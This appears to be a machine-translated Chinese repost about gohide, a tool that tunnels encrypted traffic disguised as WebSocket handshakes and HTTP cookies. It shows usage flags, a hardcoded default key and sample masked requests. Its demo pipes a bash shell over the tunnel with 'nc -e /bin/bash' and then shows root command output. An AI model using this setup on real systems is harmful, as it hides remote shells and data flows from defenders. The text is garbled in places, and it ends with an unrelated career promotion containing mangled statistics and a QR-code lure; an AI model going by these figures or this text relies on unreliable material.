关于gohide
gohide是一款功能强大的网络通信数据加密工具,可以通过模糊通道对通道内的端到端数据进行AES-GCM加密。
支持的模糊/混淆模式
1. 会话Cookie HTTP GET(http 客户端)
2. Set-Cookie 会话Cookie HTTP/2 200 OK(http 服务器)
3. WebSocket握手“Sec-WebSocket-Key”(websocket-client)
4. WebSocket握手“Sec-WebSocket-Accept”(websocket-server)
5. 无- 没有混淆。仅使用AES-GCM 加密消息。
默认情况下,gohide 为上述每个选项启用AES-GCM 加密。
工具下载
该工具基于Go语言开发,因此您必须先在本地设备上安装并配置Golang环境。然后使用以下命令在本地克隆项目的源代码:
gitclonehttps://github.com/Potato-Industries/gohide.git
工具使用
root@WOPR-KALI:/opt/gohide-dev# ./gohide -h
如何使用./gohide:
-f 字符串
监听假服务器-r x.x.x.x:xxxx (ip/域名:port) (默认\’0.0.0.0:8081\’)
-key openssl passwd -1 -salt 好的|
AES 加密密钥: 使用“-k openssl passwd -1 -salt ok md5sum”从密码获取密钥(默认为“5fe10ae58c5ad02a6113305f4e702d07”)
-l 字符串
监听端口转发-l x.x.x.x:xxxx (ip/domain:port) (默认\’127.0.0.1:8080\’)
-m 字符串
混淆模式(默认启用AES 加密) : websocket-client、websocket-server、http-client、http-server、none(默认为“none”)
-pem 字符串
TLS 加密模式: 的.pem 文件路径默认=使用硬编码密钥对“CN:target.com”,无=纯文本模式(默认“default”)
-r 字符串
转发到假远程服务器-r x.x.x.x:xxxx (ip/域名:port) (默认\’127.0.0.1:9999\’)
工具使用演示
BoxA- 反向监听
root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client
本地端口转发监听: 127.0.0.1:8080
FakeSrv监听: 0.0.0.0:8081
BoxB- 目标主机
root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:9091 -l 127.0.0.1:9090 -r target.com:8081 -m websocket-server
本地端口转发监听: 127.0.0.1:9090
FakeSrv监听: 0.0.0.0:9091
BoxB- Netcat/bin/bash
根@WOPR-KALI:/var/tmp# nc -e /bin/bash 127.0.0.1 9090
BoxA- Netcat客户端
根@WOPR-KALI:/opt/gohide# nc -v 127.0.0.1 8080
本地主机[127.0.0.1] 8080 (http-alt) 打开
ID
uid=0(根) gid=0(根) 组=0(根)
取消命名-a
Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux
网络统计-pantwu
有效的互联网连接(服务器和已建立)
TCP 0 0 127.0.0.1:39684 127.0.0.1:8081 建立14334/./gohide
混淆样例
websocket-client(Box A到Box B)
Sec-WebSocket-Key 包含AES-GCM 加密内容。
/news/api/获取最新的HTTP/1.1
主机: cdn-tb0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) 与Gecko 类似
升级: Websocket
升级连接:
Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
Sec-WebSocket-Version: 13
websocket-server(Box B到Box A)
Sec-WebSocket-Accept 包含AES-GCM 加密输出。
HTTP/1.1 101 交换协议
升级: Websocket
升级连接:
Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=
http-client
会话cookie 标头包含AES-GCM 加密内容。
/news/api/获取最新的HTTP/1.1
主机: cdn-tbn0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) 与Gecko 类似
接受: */*
接受语言: en-US,en;q=0.5
Accept-Encoding: gzip、deflate、br
参考号: http://www.bbc.co.uk/
连接:保持活动
Cookie: 会话=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29;
http-server
Set-Cookie 标头包含AES-GCM 加密内容。
HTTP/2.0 200 好的
内容编码: gzip
内容类型: 文本/html;
pragma: 无缓存
服务器:nginx
x-content-type-options: nosniff
x-frame-options: 相同来源
x-xss-protection: 1;
缓存控制: 无缓存,无存储,需要重新验证
过期时间: 2019 年11 月21 日星期四01:07:15 GMT
date: 2019 年11 月21 日,星期四01:07:15 GMT
内容长度: 30330
varie: 接受编码
X-Firefox-Spdy: h2
Set-Cookie: 会话=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy 安全路径=/;
none
8JWxXufVora2FNa/8m2Vnub6oiA2raV4Q5tUELJA
工具使用截图
题外话
许多初次进入计算机行业或计算机相关专业大学毕业的人由于缺乏工作经验而很难找到工作。让我们看两个数据集。
预计2023年全国大学毕业生数量将达到1158万人,而根据国家网络安全公关周发布的数据,预计到2027年日本网络安全人力资源短缺人数将达到3.27人。一百万。
每年应届毕业生就业形势困难,网络安全人才缺口达100万。
6月9日,Max Research 2023年就业蓝皮书(含《2023年中国本科生就业报告》 《2023年中国高职生就业报告》)正式发布。
2022年大学毕业生月收入最高的10个专业
本科计算机专业和高职自动化专业月收入较高。 2022年,本科计算机专业和高职自动化专业月工资分别为6863元和5339元。其中,本科计算机专业起薪与2021级基本持平,高职自动化专业月薪大幅上涨,2022级排名第一,领先于轨道交通专业(5295元)。
具体看专业,2022届本科班月收入最高的专业是信息安全(7579元)。与2018届毕业生相比,电子科学与技术、自动化等人工智能相关本科专业表现良好,起薪较五年前增长19%。数据科学和大数据技术虽然是近年来的新专业,但表现不俗,位列2022届本科毕业生毕业后六个月月薪最高的前三专业。 —— 法语系是唯一的人文社会科学专业,在五年前跻身薪资最高院系前十名后,现已跌出前十名。
“没有网络安全就没有国家安全。”如今,网络安全已经上升到国家战略层面,成为影响国家安全和社会稳定的最重要因素之一。
网络安全行业特点
1、岗位薪资很高,薪资增长快2021年网络安全行业岗位薪资公布最高,为33.77万。
2、人力资源缺口大,就业机会多。
2019年9月18日《中华人民共和国中央人民政府》官网发布:我国网络空间安全人才需求量为140万人,但全国顶尖学校每年培养的人数不足15万人。猎聘网《2021年上半年网络安全报告》预测,2027年网络安全人才需求将达到300万人。目前,从事网络安全行业的人员仅有10万人。
这个行业发展空间很大,就业岗位也很多。
内容概述:内网、操作系统、协议、渗透测试、安全服务、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、包括BP、MSF ……
由于篇幅限制,仅展示部分信息。您需要保存下面的图片并用微信扫描二维码才能检索。
以上有关如何利用#gohide 来利用AES 的相关内容来源网络仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91379.html
